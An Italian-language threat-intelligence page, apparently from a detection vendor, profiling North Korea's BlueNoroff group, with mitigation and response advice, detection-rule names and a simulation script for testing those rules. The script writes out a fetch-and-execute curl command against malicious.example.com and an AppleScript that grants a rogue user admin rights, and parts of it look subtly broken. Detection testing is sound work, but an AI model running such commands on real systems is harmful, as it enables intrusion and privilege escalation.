BlueNoroff Gruppo: Il Braccio Finanziario del Cybercrimine di Lazarus
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
BlueNoroff è un sottogruppo finanziariamente orientato all’interno dell’ecosistema Lazarus che si concentra su operazioni di furto di alto valore contro banche, aziende di criptovaluta e obiettivi più ampi legati al Web3. Il playbook del gruppo comprende frodi abilitate da SWIFT, compromessi in modalità watering-hole, avvelenamenti della catena di fornitura di pacchetti Go e percorsi di intrusione su macOS costruiti attorno a false esche di “colloquio di lavoro”. Per raggiungere l’esecuzione e la persistenza, BlueNoroff combina uno stack malware modulare Rust/Go con AppleScript, VBScript e flussi di lavoro di ingegneria sociale progettati per aggirare l’attenzione degli utenti e integrarsi nel legittimo sviluppo e attività amministrativa.
Indagine
Il rapporto traccia la traiettoria di BlueNoroff dal colpo alla Banca del Bangladesh del 2016 fino alla più recente attività di compromissione della catena di fornitura del 2025, evidenziando come gli strumenti e i target dell’attore si siano ampliati insieme all’ecosistema crypto/Web3. I ricercatori descrivono i modelli di infrastruttura e catalogano componenti di malware tra cui GhostCall, GhostHire, RustBucket e GillyInjector. L’indagine mappa anche i comportamenti osservati su MITRE ATT&CK attraverso fasi come ricognizione e accesso iniziale, poi esecuzione, persistenza e furto di credenziali, sottolineando un constante focus su piede stabile, consegna di payload in fasi e percorsi di accesso pronti al furto.
Mitigazione
Riduci l’esposizione rafforzando l’igiene della catena di fornitura: valida i pacchetti prelevati da registry pubblici, applica controlli di pinning e provenienza e rivedi continuamente aggiornamenti delle dipendenze per modifiche inaspettate di manutentori o codici. Su macOS, rinforza la governance di LaunchAgent/LaunchDaemon e monitora le voci di persistenza sospette e strumenti non firmati. Blocca i domini doppelgänger usati per la consegna di esche, applica MFA per identità privilegiate e servizi esposti esternamente e rendi operative le rilevazioni per script, loader e tecniche di packing malevoli noti associate all’attore. Mantieni frequenti aggiornamenti di intelligence sulle minacce e rafforza la formazione degli utenti concentrata su modelli di ingegneria sociale di spear-phishing e “recruiter/colloquio di lavoro”.
Risposta
Se vengono scoperti indicatori BlueNoroff, isola gli host coinvolti e conserva le prove chiave, comprese tutte le linee di comando, il contenuto degli script e i binari o artefatti del pacchetto scaricati. Blocca i domini malevoli identificati e gli IP C2, quindi esegui i playbook di risposta agli incidenti allineati agli scenari di furto di credenziali e compromissione della catena di fornitura. Distribuisci o sintonizza le rilevazioni per catene di esecuzione AppleScript e VBScript e per modelli sospetti di PowerShell menzionati nel rapporto, quindi amplia la ricerca per identificare endpoint aggiuntivi esposti alla stessa esca, dipendenza o sovrapposizione di infrastruttura.
Flusso d’attacco
Rilevamenti
Possibile Scoperta della Configurazione di Rete di Sistema (tramite cmdline)
Visualizza
Possibile Scoperta di Sistema Remoto o Verifica Connettività (tramite cmdline)
Visualizza
Binari Sospetti / Script in Posizione di Avvio Automatico (tramite file_event)
Visualizza
Possibile Enumerazione Account o Gruppo Amministratore (tramite cmdline)
Visualizza
IOC (Email) da rilevare: Gruppo BlueNoroff: Il Braccio del Crimine Cyber Finanziario di Lazarus
Visualizza
Rilevamento di AppleScript malevoli ed Esecuzione di Comandi ClickFix [Creazione Processo Windows]
Visualizza
Enumerazione di Utenti Locali e di Dominio tramite Comandi Net [Windows Sysmon]
Visualizza
Rilevazione di Offuscamento ed Encoding PowerShell BlueNoroff [Windows Powershell]
Visualizza
Esecuzione di Simulazione
Prerequisito: La Verifica Pre-volo di Telemetria e Baseline deve essere passata.
Razionale: Questa sezione dettaglia l’esatta esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi di Attacco:
- Esecuzione di AppleScript (T1546.016) – L’attaccante deposita un
payload.scptmalevolo sull’endpoint (es. tramite un allegato di phishing). Utilizzando unosascript.exepreinstallato (incluso con uno strumento di terze parti), lanciano lo script per eseguire un payload PowerShell che aggiunge un nuovo account amministratore locale. - Consegna alla Clipboard tramite ClickFix (T1204.004) – L’attaccante copia un comando creato per la clipboard che invoca
curlcon uno user-agent stile Zoom per scaricare un payload di seconda fase, quindi lo esegue immediatamente tramitecmd.exe. Il comando include anche una chiamatapowershell.exe -cinline per eseguire il payload in memoria.
- Esecuzione di AppleScript (T1546.016) – L’attaccante deposita un
-
Script di Test di Regressione: Lo script seguente riproduce entrambi i comportamenti in modo deterministico.
#----- BEGIN REGRESSION TEST SCRIPT ----- # Assicurarsi di eseguire con privilegi amministrativi if (-not ([Security.Principal.WindowsPrincipal] ` [Security.Principal.WindowsBuiltInRole] "Administrator")) { Write-Error "Esegui questo script come Amministratore." exit 1 } # 1. Esecuzione di AppleScript tramite osascript.exe $appleScriptPath = "$env:TEMPmalicious.scpt" Set-Content -Path $appleScriptPath -Value @" tell application "System Events" do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`"" end tell "@ # Esegui l'AppleScript Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait # 2. Consegna alla Clipboard stile ClickFix $clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"' # Esegui tramite cmd.exe per corrispondere alla condizione della regola Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait # Pulizia: rimuovi artefatti Remove-Item -Path $appleScriptPath -Force Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # End of script #----- END REGRESSION TEST SCRIPT ----- -
Comandi di Pulizia: Rimuovere eventuali processi, file e account utente di test rimanenti.
# Interrompi eventuali processi rimanenti (difensivo – normalmente non necessario) Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force # Elimina file temporanei Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Rimuovi l'account admin di test se è stato creato if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) { Remove-LocalUser -Name "eviluser" }